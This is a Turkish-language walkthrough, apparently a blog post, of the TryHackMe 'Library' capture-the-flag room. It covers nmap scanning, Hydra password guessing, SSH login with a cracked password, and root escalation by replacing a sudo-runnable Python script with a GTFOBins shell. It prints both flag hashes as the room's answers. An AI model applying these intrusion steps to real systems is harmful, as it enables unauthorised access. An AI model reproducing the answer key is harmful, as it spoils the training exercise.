- 28 Nis 2022
- 105
- 84
LİBRARY CTF
İLK OVPN BAĞLANTIMIZI GERÇEKLEŞTİRİYORUZ
ŞİMDİ TERMİNALE GEÇELİM
ADIM 1
NMAP TARAMASI
Terminale nmap -sS -sV -sC -O -Pn ipadresi girip enter diyin
ve sonuçları bekleyelim nmap bize açık portları sürümünü v.s gösterir
adresini tarayıcıya aratalım ipadresi/robots.txt aratın
Adım 2 HYDRA
bu işlem nmap tan daha uzun sürer sabırlı olun....
şimdi yeni sayfa
ADIM 3 USER.TXT FLAG BULMA
TERMİNAL
ssh meliodas@ipadresi
yes
password isteyecek iloveyou1
whoami
meliodas
ls
bak.py user.txt
cat user.txt
6d488cbb3f111d135722c33cb635f4ec
ADIM 4 ROOT OLMA VE ROOT.TXT BULMA
Permission denied alıyoruz yetki arttırmamız gerek
yeni sayfa
sudo -l
pyhton kullanıcaz
python | GTFOBins
evet yukarıdaki linkten shell komutunu bulup alın ama önce
rm bak.py
yes
ls
user.txt
touch bak.py
ls
bak.py user.txt
nano bak.py
o shell komutunu nano ya aynı aşağıdaki resim gibi yazalım
orjinal bak.py dosyasını erişimine izni kapalı yani shell aktaramıyoruz o yüzden silip tekrar yeni bir bak.py oluşturduk
bak.py de 2. flag yani root.txt var
bu işemi yaptıktan sonra
TERMİNAL
sudo /usr/bin/python/ /home/meliodas/bak.py
whoami
root
cd /root
ls
root.txt
cat root.txt
e8c8c6c256c35515d1d344ee0488c617
ADIM 5 TRYHACKME ODASININ CEVAPLARI
1. SORU-
6d488cbb3f111d135722c33cb635f4ec
2. SORU-
e8c8c6c256c35515d1d344ee0488c617